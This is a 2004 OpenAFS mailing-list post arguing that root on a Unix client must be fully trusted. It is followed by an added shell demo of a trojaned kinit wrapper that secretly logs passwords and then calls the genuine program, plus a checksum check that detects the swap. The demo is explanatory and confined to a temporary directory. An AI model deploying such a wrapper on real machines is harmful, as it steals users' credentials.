[OpenAFS] Kerberos 5 cache in /tmp
Russ Allbery
rra@stanford.edu
Wed, 07 Apr 2004 15:03:32 -0700
Frederic Gilbert <Frederic.Gilbert@inria.fr> writes:
> - if you give the root password to some people, you're supposed to trust
> them (I don't agree, because root access to an AFS client is a limited
> privilege and can be given with a lower level of confidence than e.g.
> AFS admin);
Don't obtain AFS admin credentials on any system that you don't trust and
that is run by anyone with fewer privileges than AFS administrator.
> - under AFS, root can steal tokens too (yes, but by having to find them
> in the kernel memory, which is a quite more complex job).
No, they don't have to do any of that. They can just replace kinit or
klog with a script that mails them your password.
You have to completely trust root on a typical Unix box. That's just how
it works.
> Do people here who migrated to Kerberos5 have any workaround or opinion
> about this issue, or are they living happily with it?
Living happily with it.
--
Russ Allbery (rra@stanford.edu) <http://www.eyrie.org/~eagle/>
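The attack Russ describes above (root replacing kinit with a script that records the password) takes a few lines of shell, which is the whole point: the credential cache in /tmp is not the weakest link when root is untrusted. The following is an added example written for this page, not code from the thread or from OpenAFS; it builds a throwaway directory containing a constructed stand-in for the genuine kinit and a trojaned wrapper around it, then shows the only user-side check that is even worth trying (comparing the binary against a checksum recorded while it was genuine). The demo never touches the real /usr/bin/kinit, and "mailing" the password is replaced by appending it to a file.

```shell
#!/bin/sh
# Added example (not part of the original thread): a trojaned kinit wrapper
# of the kind root can install on a client, plus a checksum comparison that
# spots the substitution after the fact. Everything lives in a temp dir.
set -eu

DEMO=$(mktemp -d)
REAL="$DEMO/kinit.real"     # stand-in for the genuine kinit (constructed)
TROJAN="$DEMO/kinit"        # what the victim actually runs as "kinit"
trap 'rm -rf "$DEMO"' EXIT

# Constructed stand-in for the genuine kinit: reads the password from stdin
# (as kinit does when it has no tty) and reports success for principal $1.
cat > "$REAL" <<'EOF'
#!/bin/sh
read -r pw
echo "ticket obtained for $1"
EOF
chmod 755 "$REAL"

# The trojan: record principal and password (a real attacker would mail
# them), then hand the same password to the real kinit so the victim sees
# completely normal behaviour.
cat > "$TROJAN" <<'EOF'
#!/bin/sh
here=$(dirname "$0")
read -r pw
printf '%s %s\n' "$1" "$pw" >> "$here/stolen.txt"
printf '%s\n' "$pw" | "$here/kinit.real" "$@"
EOF
chmod 755 "$TROJAN"

# Checksum of a kinit binary; in practice the baseline would come from the
# package database or a hash recorded on trusted media, not from the client.
kinit_checksum() {
    cksum < "$1" | cut -d' ' -f1
}

# True when the file at $1 still matches the recorded checksum $2.
kinit_unchanged() {
    [ "$(kinit_checksum "$1")" = "$2" ]
}

# Run the scenario: record a baseline while kinit is genuine, let the victim
# authenticate through the trojan, then compare against the baseline.
demo() {
    baseline=$(kinit_checksum "$REAL")
    printf 'hunter2\n' | "$TROJAN" alice@EXAMPLE.ORG
    echo "captured by root: $(cat "$DEMO/stolen.txt")"
    if kinit_unchanged "$TROJAN" "$baseline"; then
        echo "kinit matches baseline"
    else
        echo "kinit does NOT match baseline: it has been replaced"
    fi
}
demo
```

The checksum comparison only catches a lazy attacker; root can just as easily replace cksum, the shell, or the kernel, which is exactly why the reply above says you have to trust root completely rather than worry about where the ticket cache lives.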